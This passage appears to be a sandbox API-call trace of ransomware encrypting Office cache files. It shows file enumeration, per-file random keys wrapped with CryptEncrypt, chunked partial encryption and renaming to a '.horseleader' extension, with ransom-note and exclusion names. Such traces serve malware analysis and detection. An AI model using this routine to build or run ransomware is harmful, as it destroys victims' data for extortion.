lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.767] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.767] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.767] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.768] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.783] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.784] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.784] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.852] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.852] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.852] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.852] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.853] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.853] CloseHandle (hObject=0x21c) returned 1 [0222.853] GetProcessHeap () returned 0x780000 [0222.853] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.877] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0222.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0222.880] GetProcessHeap () returned 0x780000 [0222.880] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.881] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0222.891] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0222.891] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0222.891] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0222.891] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0222.891] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0222.897] lstrlenW (lpString=".testttjffg") returned 11 [0222.897] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0222.897] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.898] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.898] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0222.898] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0222.898] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0222.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.899] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.944] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.944] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.030] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.030] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.119] CloseHandle (hObject=0x21c) returned 1 [0223.119] GetProcessHeap () returned 0x780000 [0223.119] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.119] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0223.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0223.120] GetProcessHeap () returned 0x780000 [0223.120] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.120] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0223.120] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0223.120] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0223.120] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0223.120] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0223.120] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0223.121] lstrlenW (lpString=".testttjffg") returned 11 [0223.121] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0223.121] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.121] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.121] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.121] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0223.121] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0223.121] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0223.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.121] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.124] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.125] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.125] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.151] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.151] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.151] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.151] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.153] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.153] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.154] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.154] CloseHandle (hObject=0x21c) returned 1 [0223.154] GetProcessHeap () returned 0x780000 [0223.154] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.154] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0223.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0223.155] GetProcessHeap () returned 0x780000 [0223.155] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.156] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0223.156] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0223.156] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0223.156] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0223.156] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0223.156] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0223.156] lstrlenW (lpString=".testttjffg") returned 11 [0223.156] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0223.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.156] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.157] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0223.157] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0223.157] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0223.157] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.157] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.189] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.189] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.632] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.763] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.763] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.780] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.781] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.783] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.785] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.785] CloseHandle (hObject=0x21c) returned 1 [0223.785] GetProcessHeap () returned 0x780000 [0223.785] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.785] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0223.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0223.786] GetProcessHeap () returned 0x780000 [0223.786] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.786] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0223.786] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0223.786] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0223.786] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0223.786] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0223.787] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0223.787] lstrlenW (lpString=".testttjffg") returned 11 [0223.787] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0223.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 